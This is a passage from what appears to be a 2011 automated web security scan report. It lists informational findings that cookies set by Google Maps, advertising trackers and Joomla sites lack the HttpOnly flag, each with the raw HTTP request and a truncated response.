The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d76/x26 HTTP/1.1
Host: khm1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=cf9e7ea08ee15b44:TM=1295973396:LM=1295973396:S=r_nSTLT0WyjGau-L; expires=Thu, 24-Jan-2013 16:36:36 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 16:36:36 GMT
Server: btfe
Content-Length: 1368
X-XSS-Protection: 1; mode=block
Connection: close


<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

14.299. http://khmdb0.google.com/kh

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khmdb0.google.com
Path:   /kh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=a7f10d14c4f00411:TM=1295973412:LM=1295973412:S=4E7KVheBazHuNfU4; expires=Thu, 24-Jan-2013 16:36:52 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a7f10d14c4f00411:TM=1295973412:LM=1295973412:S=4E7KVheBazHuNfU4; expires=Thu, 24-Jan-2013 16:36:52 GMT; path=/; domain=.google.com
Date: Tue, 25 Jan 2011 16:36:52 GMT
Server: btfe
Content-Length: 1356
X-XSS-Protection: 1; mode=block
Connection: close


<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

14.300. http://khmdb1.google.com/kh

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khmdb1.google.com
Path:   /kh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=bb0c184c4092797e:TM=1295973518:LM=1295973518:S=TQ6x1q9xqq1iW1xq; expires=Thu, 24-Jan-2013 16:38:38 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=bb0c184c4092797e:TM=1295973518:LM=1295973518:S=TQ6x1q9xqq1iW1xq; expires=Thu, 24-Jan-2013 16:38:38 GMT; path=/; domain=.google.com
Date: Tue, 25 Jan 2011 16:38:38 GMT
Server: btfe
Content-Length: 1356
X-XSS-Protection: 1; mode=block
Connection: close


<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

14.301. http://kickapps.yuku.com/service/searchEverythingAsRss.kickAction

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kickapps.yuku.com
Path:   /service/searchEverythingAsRss.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • as=40337; Expires=Wed, 26-Jan-2011 02:23:07 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /service/searchEverythingAsRss.kickAction?vars=service/searchEverything.kickAction&keywords=editorspick&includeVideo=on&includeAudio=on&includePhoto=on&includeBlog=on&includeUser=on&includeGroups=on&includeMessages=on&as=40337&quantity=25 HTTP/1.1
Host: kickapps.yuku.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D292A4D71B9969B4DAEDD671301D676; as=40337

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:07 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:23:07 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/xml;charset=UTF-8
Content-Length: 92452

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:apple-wallpapers="http://www.apple.com/
...[SNIP]...

14.302. http://km-kh.com/km/joomla-news/63-joomlar-16-has-arrived.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://km-kh.com
Path:   /km/joomla-news/63-joomlar-16-has-arrived.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • bfc3e2967dd72ed37a11f38ece00cbdc=hb6tgivnu3fs856304vak8l845; path=/
  • lang=deleted; expires=Sun, 24-Jan-2010 22:39:08 GMT; path=/
  • jfcookie=deleted; expires=Sun, 24-Jan-2010 22:39:08 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /km/joomla-news/63-joomlar-16-has-arrived.html HTTP/1.1
Host: km-kh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:09 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bfc3e2967dd72ed37a11f38ece00cbdc=hb6tgivnu3fs856304vak8l845; path=/
Set-Cookie: lang=deleted; expires=Sun, 24-Jan-2010 22:39:08 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Sun, 24-Jan-2010 22:39:08 GMT; path=/
Set-Cookie: jfcookie[lang]=km; expires=Tue, 25-Jan-2011 22:39:09 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- KM-KH_Dome_PRO 1.5.0 - 9c85759485d4ad60e488bd5cc6161c7b4c1dd24defa833f5d
...[SNIP]...

14.303. http://kontentdesign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kontentdesign.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 352408000473833862436b9fb7dcdeb1=6df78a54dbe3289d598ffc0f146b9b17; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: kontentdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 352408000473833862436b9fb7dcdeb1=6df78a54dbe3289d598ffc0f146b9b17; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:08 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.304. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • C2=inePNJpwIg02FVGCdbdRlhgohXUZwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
  • GUID=MTI5NTkwMzIwMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=6bbPNJpwIg02FAHCdbdBwhgohXAcwOoAM/oBeK7YDwAoGW8r1VQcKa4qGKGBI9YBlP53FkL3Fx6gPbw6TVE0su2B/0mxdC; GUID=MTI5NTg5MDE3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 21:06:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=inePNJpwIg02FVGCdbdRlhgohXUZwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
Set-Cookie: GUID=MTI5NTkwMzIwMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 24 Jan 2011 22:06:42 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

14.305. http://loadus.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
  • myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; expires=Fri, 25-Mar-2011 21:06:41 GMT; path=/; domain=.exelator.com
  • BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
  • TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
  • EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=load.exelator.com
  • EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=loadus.exelator.com
  • EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDK0qi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNlKxrAa8pD0k%253D; myPAL=eJxLtDK2qs60MrAutjIyt1IyNDGzVLa0tDRUNjQwUTYwM1AOATJ8gSJGStaZVoYgZWYgZeamUGXmBsoGBoZAZeYGMFVGcMPgqjANqwUAip0atg%253D%253D; BFF=eJxLtDKxqi62MjSwUgoxNDDxdbC0tDRSss60MjQxN7UGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdameLSYmYJ1GIKFUcSQlFrjCRhCRI3N0C31QQiDBepxW4EWC1WI2oBnuw0eQ%253D%253D; TFF=eJyNj7ENgDAMBHdhgncIsew0GYM2RQokOugQu2MoKAKIFNa7uHvps4pui5LTjuATApKIuC5mdbpNStHO82CB6w0S9wdPJ99XvLPrK49vrc2whG%252FvLmOZ81q%252Buv3bCkYC6Ge1vU%252F%252BczVVHt9am2HJaCL3AyAZcuM%253D

Response

HTTP/1.1 200 OK
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; expires=Fri, 25-Mar-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Date: Mon, 24 Jan 2011 21:06:41 GMT
Server: HTTP server
Content-Length: 975

document.write('<img src="http://ad.yieldmanager.com/pixel?id=285379&data=245001&id=716806&data=245001&id=199372&data=245001&id=302775&data=245001&id=716807&data=245001&t=2" width="1" height="1"></img
...[SNIP]...

14.306. http://magazine.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://magazine.joomla.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • e4ca47a488ed5dc0028ed0df7e92e4e0=9b4bdea32449b3b75368de62daaab55e; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: magazine.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: C8H10N4O2
X-Powered-By: TMX-194.19
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e4ca47a488ed5dc0028ed0df7e92e4e0=9b4bdea32449b3b75368de62daaab55e; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.307. https://maps-api-ssl.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

14.308. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=c21edb51d7356cca:TM=1295908855:LM=1295908856:S=PTt96tHXYS63KD3T; expires=Wed, 23-Jan-2013 22:40:56 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c21edb51d7356cca:TM=1295908855:LM=1295908856:S=PTt96tHXYS63KD3T; expires=Wed, 23-Jan-2013 22:40:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

14.309. http://maps.google.com/maps/place

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/place

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=052903314ef8577d:TM=1295908874:LM=1295908874:S=XSf7TWjb_N58vMlP; expires=Wed, 23-Jan-2013 22:41:14 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:14 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=052903314ef8577d:TM=1295908874:LM=1295908874:S=XSf7TWjb_N58vMlP; expires=Wed, 23-Jan-2013 22:41:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...

14.310. http://media.fastclick.net/w/pg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/pg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=613465378701

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:49 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 929
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT
Set-Cookie: pluto2=; domain=.fastclick.net; path=/; expires=Thu, 21-Dec-1972 00:00:00 GMT

<html><body><img alt="." src="https://r.openx.net/img?pixel_id=87f68fb6efd387eabfa1cbefde1f1914" />

<img src="https://ad.yieldmanager.com/pixel?id=938566&t=2" width="1" height="1" />

<!-- Google
...[SNIP]...

14.311. http://media.fastclick.net/w/tre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT
  • pluto=613465378701; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAAQ2HClNACAAAb1EIASgAAQOPQAAGeAKF0AAAYsO4AkvAA0gLwJJvzBgRwEYRUAlgAABlDOAB0AA4AUXAQAA; pluto=613465378701

Response

HTTP/1.1 302 Redirect
Date: Tue, 25 Jan 2011 01:35:47 GMT
Location: http://media.fastclick.net/w/pg?cont_id=11&d=f
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT
